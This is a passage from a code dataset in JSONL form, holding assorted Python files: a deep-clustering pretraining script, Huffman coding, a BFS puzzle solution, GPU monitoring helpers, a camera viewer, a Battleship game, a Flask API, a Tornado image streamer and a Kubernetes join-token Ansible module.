train_test_split\n\nfrom lib.CAE import CAE_3, CAE_5, CAE_BN_5\nfrom lib.DCEC import DCEC_3, DCEC_5, DCEC_BN_5\n\n# 选GPU\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# 读数据\nfilename = 'path/to/cell_matrix_scHiCluster_01.npy'\ndata = np.load(filename, allow_pickle=True)\n\n# 数据处理为 [cell_num * chrom_num, H, W]的格式\nchrom_matrix = []\nfor i in range(len(data)):\n for matrix in data[i].values():\n matrix_tensor = torch.Tensor(matrix)\n\n # A + A.T恢复对称\n matrix_tensor = matrix_tensor + torch.transpose(matrix_tensor, 0, 1)\n\n # resize\n x = matrix_tensor.unsqueeze_(0).unsqueeze_(0)\n x = nnf.interpolate(x, size=(150, 150), mode='bilinear', align_corners=False) \n\n chrom_matrix.append(x)\nchrom_num = len(chrom_matrix)\nchrom_matrix = torch.cat(chrom_matrix, 0)\n\n# 读label\nlabels = np.load('path/to/cell_label.npy')\n\n# 数据划分\ntrain_data, val_data = train_test_split(chrom_matrix, test_size=0.2, shuffle=True)\n\n# dataset\nclass chrom_dataset(Dataset):\n def __init__(self, data=data, label=None):\n self.data = data\n\n def __getitem__(self, index):\n chrom_emb = self.data[index]\n return chrom_emb, chrom_emb\n\n def __len__(self):\n return len(self.data)\n\ntrain_set = chrom_dataset(data=train_data)\nval_set = chrom_dataset(data=val_data)\n\n# dataloader\n\nbatch_size = 32\ntrain_loader = torch.utils.data.DataLoader(\n dataset=train_set,\n batch_size=batch_size,\n shuffle=True)\nval_loader = torch.utils.data.DataLoader(\n dataset=val_set,\n batch_size=batch_size,\n shuffle=False)\n\n\n# pretrain CAE\ncae = CAE_BN_5(input_shape=[150,150,1], embedding_dim=30, num_clusters=4, filters=[32, 32, 64, 64, 128])\nprint(cae)\ncae.fit(chrom_matrix, labels, train_loader, val_loader, lr=0.0003, num_epochs=5, loss_type=\"mse\")\n\n\n","sub_path":"Ramani/DCEC/run_pretrain.py","file_name":"run_pretrain.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"375172412","text":"import sys\n\nclass TreeNode:\n def __init__(self, weight, c):\n self.right = None\n self.left = None\n self.weight = weight\n self.char = c\n\ndef huffman_encoding(data):\n weights_dict = {}\n for c in data:\n if c not in weights_dict:\n weights_dict[c] = TreeNode(1, c)\n else:\n weights_dict[c].weight += 1\n\n weight_list = list(weights_dict.values())\n def get_value(node):\n return node.weight\n\n weight_list.sort(key=get_value)\n codes = {}\n for c in weights_dict.keys():\n codes[c] = \"\"\n # for node in weight_list:\n # print(node.weight)\n if len(weight_list) == 0:\n return \"\", None\n\n elif len(weight_list) == 1:\n tmp = weight_list.pop(0)\n root = TreeNode(tmp.weight, tmp.char)\n root.left = tmp\n weight_list.append(root)\n codes[weight_list[0].char] = \"0\"\n else:\n while len(weight_list) > 1:\n left = weight_list.pop(0)\n right = weight_list.pop(0)\n for c in left.char:\n codes[c] = \"0\" + codes[c]\n for c in right.char:\n codes[c] = \"1\" + codes[c]\n\n new_node = TreeNode(left.weight+right.weight, left.char+right.char)\n new_node.left = left\n new_node.right = right\n weight_list.append(new_node)\n weight_list.sort(key=get_value)\n # print(codes)\n encoded_data = \"\"\n for c in data:\n encoded_data += codes[c]\n return encoded_data, weight_list[0]\n\n\ndef huffman_decoding(data,tree):\n if data == \"\" or tree == None:\n return data\n\n root = tree\n ans = \"\"\n for i in data:\n if i == \"0\":\n root = root.left\n else:\n root = root.right\n if root.left == root.right == None:\n ans += root.char\n root = tree\n return ans\n\ndef test(s):\n print (\"The size of the data is: {}\\n\".format(sys.getsizeof(s)))\n print (\"The content of the data is: {}\\n\".format(s))\n\n encoded_data, tree = huffman_encoding(s)\n if encoded_data == \"\":\n print (\"The size of the encoded data is: {}\\n\".format(sys.getsizeof(encoded_data)))\n else:\n print (\"The size of the encoded data is: {}\\n\".format(sys.getsizeof(int(encoded_data, base=2))))\n print (\"The content of the encoded data is: {}\\n\".format(encoded_data))\n\n decoded_data = huffman_decoding(encoded_data, tree)\n\n print (\"The size of the decoded data is: {}\\n\".format(sys.getsizeof(decoded_data)))\n print (\"The content of the decoded data is: {}\\n\".format(decoded_data))\n\nif __name__ == \"__main__\":\n test(\"The bird is the word\")\n test(\"AAAAAAAAA\")\n test(\"\")\n\n# *****************output*****************\n# The size of the data is: 69\n\n# The content of the data is: The bird is the word\n\n# The size of the encoded data is: 36\n\n# The content of the encoded data is: 0110111011111100111000001010110000100011010011110111111010101011001010\n\n# The size of the decoded data is: 69\n\n# The content of the decoded data is: The bird is the word\n\n# The size of the data is: 58\n\n# The content of the data is: AAAAAAAAA\n\n# The size of the encoded data is: 24\n\n# The content of the encoded data is: 000000000\n\n# The size of the decoded data is: 58\n\n# The content of the decoded data is: AAAAAAAAA\n\n# The size of the data is: 49\n\n# The content of the data is:\n\n# The size of the encoded data is: 49\n\n# The content of the encoded data is:\n\n# The size of the decoded data is: 49\n\n# The content of the decoded data is:\n","sub_path":"P2/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"135489253","text":"from collections import deque\n\nN, M, K = map(int, input().split())\ngym = [input() for _ in range(N)]\nx1, y1, x2, y2 = map(int, input().split()); x1 -= 1; y1 -= 1; x2 -= 1; y2 -= 1\nvisited = [[0]*M for _ in range(N)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\nQ = deque([(x1, y1)])\nans = False\n\nwhile Q:\n x, y = Q.popleft()\n if x == x2 and y == y2:\n ans = True\n break\n for mode in range(4):\n for num in range(1, K+1):\n nx = x + dx[mode]*num\n ny = y + dy[mode]*num\n if nx < 0 or nx >= N or ny < 0 or ny >= M or gym[nx][ny] == '#': break\n if not visited[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n Q.append((nx, ny))\n elif visited[nx][ny] == visited[x][y] + 1:\n continue # 일단 직진\n else:\n break # 더 큰길은 안감\n\n\nif ans:\n print(visited[x2][y2])\nelse:\n print(-1)\n","sub_path":"AHYEON/02.DFSBFS/16930_달리기(bfs).py","file_name":"16930_달리기(bfs).py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"537422489","text":"r\"\"\"\nHelper functions\n\"\"\"\nimport sys\nimport time\nfrom datetime import datetime\nfrom contextlib import contextmanager\nimport torch\nimport random\nimport subprocess\n\n@contextmanager\ndef add_prefix_to_print(prefix): \n global is_new_line\n orig_write = sys.stdout.write\n is_new_line = True\n def new_write(*args, **kwargs):\n global is_new_line\n if args[0] == \"\\n\":\n is_new_line = True\n elif is_new_line:\n orig_write(\"[\" + str(prefix) + \"]: \")\n is_new_line = False\n orig_write(*args, **kwargs)\n sys.stdout.write = new_write\n yield\n sys.stdout.write = orig_write\n\n@contextmanager\ndef timer(label):\n import time\n start = time.time()\n yield\n print(f\"[Process {label}] elasped in {time.time()-start}\")\n \ndef get_output_shape(model, image_dim):\n return model(torch.rand(*(image_dim))).data.shape\n\ndef generate_seed():\n return random.randint(1, 100000)\n\ndef get_gpu_info():\n sp = subprocess.Popen(['nvidia-smi', '-q'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_str = sp.communicate()\n out_list = out_str[0].decode(\"utf8\").split('\\n')\n out_dict = {}\n for item in out_list:\n try:\n key, val = item.split(':')\n key, val = key.strip(), val.strip()\n if key in out_dict: # Already exists\n out_dict[key].append(val)\n else:\n out_dict[key] = [val]\n except:\n pass\n return out_dict\n\ndef get_general_info(pid):\n sp = subprocess.Popen([\"ps\", \"-up\", str(pid)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_str = sp.communicate()\n outputs = out_str[0].decode(\"utf8\").split(\"\\n\")\n labels = outputs[0].split()\n info = outputs[1].split()\n if len(info) > len(labels): # Join commands that were splitted\n last_label_idx = len(labels)-1 \n info[last_label_idx] = \" \".join(info[last_label_idx:])\n info = info[:len(labels)]\n process_info = {labels[i]: info[i] for i in range(len(info))}\n return process_info\n\ndef get_all_gpu_processes_info():\n processes = {}\n out_dict = get_gpu_info()\n if \"Total\" in out_dict: \n max_gpu = int(out_dict[\"Total\"][0].split()[0])\n else:\n max_gpu = -1\n processes[\"max_gpu\"] = max_gpu\n processes[\"time_updated\"] = datetime.now().strftime(\"%m/%d/%Y-%H:%M:%S\")\n for i, process_id in enumerate(out_dict[\"Process ID\"]):\n process_info = get_general_info(process_id)\n processes[process_id] = {\n \"name\": out_dict[\"Name\"][i],\n \"user\": process_info[\"USER\"],\n \"gpu_used\": int(out_dict[\"Used GPU Memory\"][i].split()[0]),\n \"%cpu_used\": float(process_info[\"%CPU\"]),\n \"%mem_used\": float(process_info[\"%MEM\"]),\n \"command\": process_info[\"COMMAND\"]\n }\n return processes\n \n","sub_path":"dopt/utils/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"46216339","text":"import cv2\nimport time\nimport threading\n\n'''\n Open UVC device\n'''\nclass camThread(threading.Thread):\n def __init__(self, previewName, camID, camFourCC):\n threading.Thread.__init__(self)\n self.previewName = previewName\n self.camID = camID\n self.camFourCC = camFourCC\n def run(self):\n print (\"Starting \" + self.previewName)\n camPreview(self.previewName, self.camID, self.camFourCC)\n\ndef camPreview(previewName, camID, camFourCC):\n cv2.namedWindow(previewName)\n cam = cv2.VideoCapture(camID)\n if cam.isOpened(): # try to get the first frame\n\n if(camFourCC == cv2.VideoWriter.fourcc('Y','1','6',' ')):\n cam.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter.fourcc('Y','1','6',' '))\n cam.set(cv2.CAP_PROP_CONVERT_RGB, 0)\n else:\n cam.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\n cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n cam.set(cv2.CAP_PROP_AUTOFOCUS, 0) # turn the autofocus off\n\n print('width: {}, height : {}, frame? : {}, ? : {}'.format(cam.get(3), cam.get(4), cam.get(5), cam.get(8)))\n\n rval, frame = cam.read()\n else:\n rval = False\n\n while rval:\n rval, frame = cam.read()\n if(camFourCC == cv2.VideoWriter.fourcc('Y','1','6',' ')):\n # In order to display image, should be scaled and normalize.\n #minVal = numpy.amin(gray16Frame)\n #maxVal = numpy.amax(gray16Frame)\n #cv2.normalize(gray16Frame, gray16Frame, minVal, maxVal, cv2.NORM_MINMAX) \n #cv2.normalize(gray16Frame, gray16Frame, minVal, 65535, cv2.NORM_MINMAX)\n cv2.normalize(frame, frame, 20000, 65535, cv2.NORM_MINMAX) # Best Normalized \n\n cv2.imshow(previewName, frame)\n\n key = cv2.waitKey(20)\n if key == 27: # exit on ESC\n break\n\n if cam.isOpened():\n cam.release()\n cv2.destroyWindow(previewName) \n\n# Create two threads for both visible and thermal camera\n#threadVisibleCam = camThread(\"visible camera\", 0, None)\nthreadThermalCam = camThread(\"thermal camera\", \"/dev/video2\", cv2.VideoWriter.fourcc('Y','1','6',' '))\n\n#threadVisibleCam.start()\nthreadThermalCam.start()\n\n\n","sub_path":"Samples/Linux/Python/thermocam160b.py","file_name":"thermocam160b.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"420462801","text":"Map_Battleship_Player_One = []\r\nMap_Battleship_Player_Two = []\r\n\r\n\r\nclass MapBattleship:\r\n def __init__(self, map_size):\r\n self.map_size = map_size\r\n\r\n def create_map(self):\r\n map_element = \"*\"\r\n for x in range(self.map_size):\r\n map_line = []\r\n for y in range(self.map_size):\r\n map_line += map_element\r\n Map_Battleship_Player_One.append(map_line)\r\n\r\n def create_map2(self):\r\n map_element = \"*\"\r\n for x in range(self.map_size):\r\n map_line = []\r\n for y in range(self.map_size):\r\n map_line += map_element\r\n Map_Battleship_Player_Two.append(map_line)\r\n\r\n def print_map_one(self):\r\n for x in range(self.map_size):\r\n print(Map_Battleship_Player_One[x])\r\n\r\n def print_map_two(self):\r\n for x in range(self.map_size):\r\n print(Map_Battleship_Player_Two[x])\r\n\r\n\r\nclass Ships:\r\n # Types: pb, b, s, c\r\n # Start: location on board, needs to be array, Between 0 and 9\r\n # Orientation: Up, Down, Left, Right\r\n def __init__(self, ship_type, start_one, start_two, orientation, player_map_own):\r\n self.ship_type = ship_type\r\n self.start_one = start_one\r\n self.start_two = start_two\r\n self.orientation = orientation\r\n self.player_own_map = player_map_own\r\n\r\n def get_length(self):\r\n if self.ship_type == \"P\":\r\n return 2\r\n if self.ship_type == \"B\":\r\n return 3\r\n if self.ship_type == \"S\":\r\n return 3\r\n if self.ship_type == \"D\":\r\n return 4\r\n if self.ship_type == \"C\":\r\n return 5\r\n\r\n def check_map(self):\r\n can_place = False\r\n if self.orientation == \"Up\":\r\n if self.start_one - self.get_length() < 0:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Down\":\r\n if self.start_one + self.get_length() > 9:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Left\":\r\n if self.start_two - self.get_length() < 0:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if self.orientation == \"Right\":\r\n if self.start_two + self.get_length() > 9:\r\n print(\"Error\")\r\n else:\r\n can_place = True\r\n\r\n if can_place:\r\n return True\r\n else:\r\n return False\r\n\r\n def put_in_map(self):\r\n ship_type = str(self.ship_type)\r\n if self.check_map():\r\n for x in range(self.get_length()):\r\n if self.orientation == \"Up\":\r\n self.player_own_map[self.start_one - x][self.start_two] = ship_type\r\n if self.orientation == \"Down\":\r\n self.player_own_map[self.start_one + x][self.start_two] = ship_type\r\n if self.orientation == \"Left\":\r\n self.player_own_map[self.start_one][self.start_two - x] = ship_type\r\n if self.orientation == \"Right\":\r\n self.player_own_map[self.start_one][self.start_two + x] = ship_type\r\n else:\r\n print(\"Enter Again ship \" + ship_type + \" in orientation \" + self.orientation)\r\n\r\n\r\nclass PlayerInput:\r\n def __init__(self):\r\n self.x_val = 0\r\n self.y_val = 0\r\n self.other_map = []\r\n\r\n def input_values(self, x_value, y_value, other_player_map):\r\n self.x_val = x_value\r\n self.y_val = y_value\r\n self.other_map = other_player_map\r\n\r\n def check_attempt(self):\r\n if self.other_map[self.x_val][self.y_val] == \"*\" or self.other_map[self.x_val][self.y_val] == \"~\":\r\n print(\"Missed\")\r\n return False\r\n elif self.other_map[self.x_val][self.y_val] != \"*\" or self.other_map[self.x_val][self.y_val] != \"~\":\r\n print(\"Player Hit\")\r\n self.other_map[self.x_val][self.y_val] = \"~\"\r\n return True\r\n\r\n\r\npl_one = [[\"P\", 0, 0, \"Right\"],\r\n [\"P\", 8, 1, \"Right\"],\r\n [\"B\", 1, 6, \"Left\"],\r\n [\"B\", 1, 9, \"Down\"],\r\n [\"S\", 3, 4, \"Down\"],\r\n [\"D\", 0, 9, \"Left\"],\r\n [\"C\", 9, 9, \"Left\"]\r\n ]\r\n\r\npl_two = [[\"P\", 9, 9, \"Left\"],\r\n [\"P\", 9, 0, \"Up\"],\r\n [\"B\", 4, 8, \"Left\"],\r\n [\"B\", 5, 4, \"Left\"],\r\n [\"S\", 8, 7, \"Up\"],\r\n [\"D\", 8, 3, \"Right\"],\r\n [\"C\", 0, 9, \"Left\"]\r\n ]\r\n\r\n\r\nclass PlayerInit:\r\n def __init__(self):\r\n self.player_map = []\r\n\r\n def populate_map(self, player_map_own, pl_list):\r\n self.player_map = player_map_own\r\n for x in range(7):\r\n ship_name = str(x)\r\n ship_name = Ships(pl_list[x][0], pl_list[x][1], pl_list[x][2], pl_list[x][3], self.player_map)\r\n ship_name.check_map()\r\n ship_name.put_in_map()\r\n\r\n\r\ndef check_map_status():\r\n is_dead = False\r\n for x in range(10):\r\n for y in range(10):\r\n if Map_Battleship_Player_One[x][y] != \"*\" and Map_Battleship_Player_One[x][y] != \"~\":\r\n is_dead = True\r\n\r\n return is_dead\r\n\r\n\r\ndef main():\r\n map_battle = MapBattleship(10)\r\n map_battle.create_map()\r\n map_battle.create_map2()\r\n\r\n player_one_input = PlayerInput()\r\n player_two_input = PlayerInput()\r\n\r\n player_one_layout = PlayerInit()\r\n player_one_layout.populate_map(Map_Battleship_Player_One, pl_one)\r\n\r\n player_two_layout = PlayerInit()\r\n player_two_layout.populate_map(Map_Battleship_Player_Two, pl_two)\r\n\r\n print(\"Player One Map\")\r\n map_battle.print_map_one()\r\n print(\"Player Two Map\")\r\n map_battle.print_map_two()\r\n\r\n while check_map_status():\r\n print(\"Player One Turn\")\r\n one_x_val = int(input(\"Enter X Val\"))\r\n one_y_val = int(input(\"Enter Y Val\"))\r\n player_one_input.input_values(one_x_val, one_y_val, Map_Battleship_Player_Two)\r\n player_one_input.check_attempt()\r\n map_battle.print_map_one()\r\n\r\n print(\"Player Two Turn\")\r\n two_x_val = int(input(\"Enter X Val\"))\r\n two_y_val = int(input(\"Enter Y Val\"))\r\n player_two_input.input_values(two_x_val, two_y_val, Map_Battleship_Player_One)\r\n player_two_input.check_attempt()\r\n map_battle.print_map_two()\r\n\r\n print(\"Game Over\")\r\n\r\n\r\nmain()\r\n","sub_path":"Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"337771710","text":"import cv2\r\nimport imagezmq\r\nimport tornado.ioloop\r\nimport tornado.web\r\nimport tornado.websocket\r\nimport threading\r\nimport base64\r\n\r\n\r\nhub = imagezmq.ImageHub()\r\ngImage = None\r\ngRpi_name = None\r\n\r\nclass IndexHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render('index.html', ws_text=\"ws\")\r\n\r\nclass webCamHandler(tornado.web.RequestHandler):\r\n\r\n def get(self, cam_id):\r\n self.render('index.html', ws_text=\"ws/\"+cam_id)\r\n\r\nclass CamSocketHandler(tornado.websocket.WebSocketHandler):\r\n def __init__(self, *args, **kwargs):\r\n super(CamSocketHandler, self).__init__(*args, **kwargs)\r\n self.camNum = None\r\n\r\n def open(self, *args, **kwargs):\r\n print(\"WebSocket opened\")\r\n self.camNum = args[0]\r\n print(\"camNum :\"+self.camNum)\r\n\r\n def on_message(self, message):\r\n\r\n image = gImage\r\n\r\n if image is not None and self.camNum == gRpi_name:\r\n image = base64.b64encode(image)\r\n self.write_message(image)\r\n\r\n def on_close(self):\r\n print(\"WebSocket closed\")\r\n\r\nclass SocketHandler(tornado.websocket.WebSocketHandler):\r\n def __init__(self, *args, **kwargs):\r\n super(SocketHandler, self).__init__(*args, **kwargs)\r\n\r\n def on_message(self, message):\r\n\r\n image = gImage\r\n\r\n if image is not None:\r\n image = base64.b64encode(image)\r\n self.write_message(image)\r\n\r\n def open(self):\r\n print(\"WebSocket opened\")\r\n\r\n def on_close(self):\r\n print(\"WebSocket closed\")\r\n\r\ndef get_image():\r\n global gImage\r\n global gRpi_name\r\n while True:\r\n gRpi_name, gImage = hub.recv_jpg()\r\n hub.send_reply(b'OK')\r\n\r\napp = tornado.web.Application([\r\n (r'/', IndexHandler),\r\n (r\"/webcam/([0-9]+)\", webCamHandler),\r\n (r'/ws/([0-9]+)', CamSocketHandler),\r\n (r'/ws', SocketHandler)\r\n])\r\n\r\nif __name__ == \"__main__\":\r\n t = threading.Thread(target=get_image)\r\n t.daemon = True\r\n t.start()\r\n app.listen(7777)\r\n tornado.ioloop.IOLoop.current().start()\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"177893452","text":"from src.blockchain_utils.credentials import get_client, get_account_credentials\nfrom src.services.game_engine_service import GameEngineService\n\nclient = get_client()\n\nacc_pk, acc_address, _ = get_account_credentials(account_id=4)\nplayer_x_pk, player_x_address, _ = get_account_credentials(account_id=1)\nplayer_o_pk, player_o_address, _ = get_account_credentials(account_id=2)\n\ngame_engine = GameEngineService(app_creator_pk=acc_pk,\n app_creator_address=acc_address,\n player_x_pk=player_x_pk,\n player_x_address=player_x_address,\n player_o_pk=player_o_pk,\n player_o_address=player_o_address)\n\ngame_engine.deploy_application(client=client)\ngame_engine.start_game(client=client)\n\ngame_actions = [\n (\"X\", 0),\n (\"O\", 1),\n (\"X\", 2),\n (\"O\", 4),\n (\"X\", 3),\n (\"O\", 5),\n (\"X\", 7),\n (\"O\", 6),\n (\"X\", 8),\n]\n\nfor player_id, action_position in game_actions:\n game_engine.play_action(client=client,\n player_id=player_id,\n action_position=action_position)\n\n\ngame_engine.fund_escrow(client=client)\ngame_engine.tie_money_refund(client=client)\n\n","sub_path":"tie_game.py","file_name":"tie_game.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454600947","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom db.models.clusters import Cluster\nfrom event_manager.events.cluster import CLUSTER_CREATED\nfrom event_manager.events.user import USER_ACTIVATED\nfrom factories.factory_users import UserFactory\nfrom tests.utils import BaseTest\nfrom tracker.publish_tracker import PublishTrackerService\n\n\n@pytest.mark.tracker_mark\nclass PublishTrackerTest(BaseTest):\n def setUp(self):\n self.cluster = Cluster.load()\n self.admin = UserFactory(is_staff=True, is_superuser=True)\n self.user = UserFactory()\n self.publisher = PublishTrackerService()\n self.publisher.setup()\n super().setUp()\n\n def test_record_calls_identify_if_cluster_created(self):\n with patch('analytics.identify') as mock_identify:\n with patch('analytics.track') as mock_track:\n self.publisher.record(event_type=USER_ACTIVATED,\n instance=self.user,\n actor_id=self.admin.id,\n actor_name=self.admin.username)\n\n assert mock_identify.call_count == 0\n assert mock_track.call_count == 1\n\n with patch('analytics.identify') as mock_identify:\n with patch('analytics.track') as mock_track:\n self.publisher.record(event_type=CLUSTER_CREATED,\n instance=self.cluster,\n namespace='test',\n environment='test',\n is_upgrade='test',\n provisioner_enabled=False,\n use_data_claim=False,\n use_outputs_claim=False,\n use_logs_claim=False,\n use_repos_claim=False,\n use_upload_claim=False,\n node_selector_core_enabled=False,\n node_selector_experiments_enabled=False,\n cli_min_version='',\n cli_latest_version='',\n platform_min_version='',\n platform_latest_version='',\n chart_version='',\n cpu=0,\n memory=0,\n gpu=0)\n\n assert mock_identify.call_count == 1\n assert mock_track.call_count == 1\n","sub_path":"tests/test_tracker/test_publish_tracker.py","file_name":"test_publish_tracker.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235459571","text":"# SERVICE\n\n# Capture les appels aux API\n# Ne renvoie JAMAIS de vues mais du JSON\n\nimport json\nfrom flask import current_app as app, request, Response, jsonify\nfrom .submission import Submission\nimport time\n\n@app.route('/')\ndef hello_world():\n return 'Hello world !'\n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n # Sur base de l'email, retrouver la soumission et la renvoyer\n request_data = request.get_json()\n print(request_data)\n if request_data is not None:\n email = request_data.get('postulant_email', None)\n if email is not None:\n sub = Submission.find_sumbission_by_postulant_email(email)\n if sub is not None:\n return Submission.json(sub)\n return {}\n\n@app.route('/submissions', methods=['POST'])\ndef add_submission():\n request_data = request.get_json() \n Submission.add_submission(\n request_data[\"postulant_email\"],\n request_data[\"postulant_firstname\"],\n request_data[\"postulant_lastname\"],\n request_data[\"postulant_middlename\"],\n request_data.get(\"postulant_birthday\", None)\n )\n response = Response(\"Sumbmission added\", 201, mimetype='application/json')\n return response\n\n\n@app.route('/submissions', methods=['GET'])\ndef get_movies():\n return jsonify({'Submissions': Submission.get_all_submissions()})\n\n@app.route('/submissions/', methods=['GET'])\ndef get_submission(subm_id=0):\n subm = Submission.get_submission(subm_id)\n return jsonify(subm)\n\n@app.route('/submissions//validate', methods=['POST'])\ndef validate_submission(subm_id=0):\n Submission.validate(subm_id)\n time.sleep(3)\n return Response(\"Registration validated\", 201, mimetype=\"application/json\")\n","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"480269742","text":"#!/usr/bin/env python\n#\n# Copyright 2019 Caoyingjun\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nDOCUMENTATION = '''\nauthor: Caoyingjun\n\n'''\n\nimport os\nimport subprocess\nimport yaml\n\nfrom kubernetes import client\nfrom kubernetes import config\n\n\nKUBEADMIN = '/etc/kubernetes/admin.conf'\n\n\ndef get_kube_client():\n config.kube_config.load_kube_config(\n config_file=KUBEADMIN)\n return client.CoreV1Api()\n\n\nclass GetWoker(object):\n\n def __init__(self, params):\n self.params = params\n self.get_list = self.params.get('get_list')\n self.is_ha = self.params.get('is_ha')\n self.changed = False\n\n # Use this to store arguments to pass to exit_json()\n self.result = {}\n self.kube_client = get_kube_client()\n\n def get_token(self):\n os.environ['KUBECONFIG'] = KUBEADMIN\n cmd = 'kubeadm token list | grep system:bootstrappers'\n tokens = self._run(cmd)\n tokens = tokens.split('\\n')\n\n for tk in tokens:\n if not tk:\n continue\n tk = tk.split()\n if int(tk[1][:-1]) > 0:\n token = tk[0]\n break\n else:\n # if all the token are inactive, recreate it.\n recmd = 'kubeadm token create'\n new_token = self._run(recmd)\n token = new_token[:-1]\n self.changed = True\n\n self.result['token'] = token\n\n # Get he apiserver from KUBECONFIG\n def get_kube_apiserver(self):\n with open(KUBEADMIN, 'r') as f:\n kubeconfig = yaml.load(f)\n\n kube_apiserver = kubeconfig['clusters'][0]['cluster']['server']\n\n self.result['apiserver'] = kube_apiserver.split('//')[-1]\n\n def get_token_ca_cert_hash(self):\n cmd = (\"openssl x509 -pubkey -in /etc/kubernetes/pki/ca.crt | \"\n \"openssl rsa -pubin -outform der 2>/dev/null | \"\n \"openssl dgst -sha256 -hex | sed 's/^.* //'\")\n token_ca_cert_hash = self._run(cmd)\n\n self.result['token_ca_cert_hash'] = token_ca_cert_hash[:-1]\n\n def get_certificate_key(self):\n if self.is_ha and self.result['masters_added']:\n os.environ['KUBECONFIG'] = KUBEADMIN\n cmd = 'kubeadm init phase upload-certs --upload-certs'\n certificate_key = self._run(cmd)\n certificate_key = certificate_key.split()[-1]\n self.result['certificate_key'] = certificate_key\n else:\n self.result['certificate_key'] = None\n\n def _run(self, cmd):\n proc = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True)\n stdout, _ = proc.communicate()\n return stdout\n\n @property\n def kube_nodes(self):\n kube_nodes = [node.metadata.name\n for node in self.kube_client.list_node().items]\n return kube_nodes\n\n def get_update_nodes(self):\n kube_masters = self.params.get('kube_masters')\n kube_workers = self.params.get('kube_workers')\n masters_sets = set(kube_masters) - set(self.kube_nodes)\n workers_sets = set(kube_workers) - set(self.kube_nodes)\n self.result['masters_added'] = list(masters_sets)\n self.result['workers_added'] = list(workers_sets - masters_sets)\n\n def run(self):\n self.get_kube_apiserver()\n self.get_update_nodes()\n self.get_token()\n self.get_token_ca_cert_hash()\n self.get_certificate_key()\n\n\ndef main():\n specs = dict(\n kube_masters=dict(type='list', required=True),\n kube_workers=dict(type='list', required=True),\n get_list=dict(type='list', required=True),\n is_ha=dict(type='bool', default=False),\n )\n\n module = AnsibleModule(argument_spec=specs, bypass_checks=True)\n params = module.params\n\n gw = None\n try:\n gw = GetWoker(params)\n gw.run()\n module.exit_json(changed=gw.changed, result=gw.result)\n except Exception as emsg:\n module.fail_json(changed=True, msg=emsg, faild=True)\n\n\n# import module snippets\nfrom ansible.module_utils.basic import * # noqa\nif __name__ == '__main__':\n main()\n","sub_path":"ansible/library/kube_get.py","file_name":"kube_get.py","file_ext":"py","file_size_in_byte":4719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432432447","text":"def exchange_first_last(seq):\n a_new_sequence1 = seq[-1:]+seq[1:-1]+seq[0:1]\n return a_new_sequence1\n\ndef every_other(seq):\n a_new_sequence2 = seq[0::2]\n return a_new_sequence2\n\ndef middle_every_other(seq):\n a_new_sequence3 = seq[4:-4:2]\n return a_new_sequence3\n\ndef reversed(seq):\n a_new_sequence4 = seq[::-1]\n return a_new_sequence4\n\ndef thirds(seq):\n a=int(len(seq)/3)\n a_new_sequence5 = seq[a:]+seq[:a]\n return a_new_sequence5\n\na_string = \"this is a string\"\na_tuple = (2, 54, 13, 12, 5, 32)\n\nassert exchange_first_last(a_string) == \"ghis is a strint\"\nassert exchange_first_last(a_tuple) == (32, 54, 13, 12, 5, 2)\nassert every_other(a_string) == \"ti sasrn\"\nassert every_other(a_tuple) == (2,13,5)\nassert middle_every_other(a_string) == \" sas\"\nassert middle_every_other(a_tuple) == ()\nassert reversed(a_string) == \"gnirts a si siht\"\nassert reversed(a_tuple) == (32, 5, 12, 13, 54, 2)\nassert thirds(a_string) == \"is a stringthis \"\nassert thirds(a_tuple) == (13, 12, 5, 32, 2, 